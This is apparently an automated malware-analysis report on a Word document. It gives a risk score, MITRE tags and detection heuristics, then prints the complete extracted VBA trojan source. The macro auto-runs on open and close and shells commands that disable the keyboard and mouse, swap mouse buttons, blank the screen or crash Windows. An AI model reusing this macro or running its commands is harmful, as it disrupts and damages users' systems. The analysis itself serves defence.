MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros with AutoOpen and AutoClose functions. These macros execute various shell commands, including disabling input devices and launching multiple applications, indicative of a destructive or disruptive payload. The presence of `Shell()` calls and the execution of system utilities strongly suggest a malicious intent to interfere with the user's system operations.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1935 bytes |
SHA-256: b24645135fa6df7c065402bc821f29e649cca08e1b39c6309261742a9bf767ab |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
'W97T/6-Trix by Error and Hash from TN
'-----------simply for fun----------
' Warning you now:
' This is a nasty but SIMPLE trojan
'-----------------------------------
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
ByVal lParam As Long) As Long
Private Const WM_SYSCOMMAND = &H112&
Private Const SC_MONITORPOWER = &HF170&
Sub AutoOpen()
Call Nukeit
End Sub
Sub AutoClose()
Call Nukeit
End Sub
Function Nukeit()
Randomize Timer
x = Int(Rnd(1) * 5) + 1
If x = 1 Then
'Are you Ambidexterous?
Shell "rundll32 user,swapmousebutton"
End If
If x = 2 Then
'Try typing without a keyboard...and a mouse
Shell "rundll32 keyboard,disable"
Shell "rundll32 mouse,disable"
End If
If x = 3 Then
'WTF happened to my screen!!!
Dim Ret As Long
Ret = SendMessage(-1, WM_SYSCOMMAND, SC_MONITORPOWER, 0&)
End If
If x = 4 Then
'Where did windows Go?!
Shell "rundll32 krnl386.exe,exitkernel"
End If
If x = 5 Then
'Blue screen of DEATH!!!
Shell "rundll32 user,disableoemlayer"
End If
If x = 6 Then
Do While z <> 1000
'Overload windows!!
s = Shell("notepad.exe", vbNormalFocus)
s = Shell("ping.exe", vbNormalFocus)
s = Shell("tracert.exe", vbNormalFocus)
s = Shell("calc.exe", vbNormalFocus)
s = Shell("charmap.exe", vbNormalFocus)
s = Shell("pbrush.exe", vbNormalFocus)
s = Shell("write.exe", vbNormalFocus)
z = z + 1
Loop
End If
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.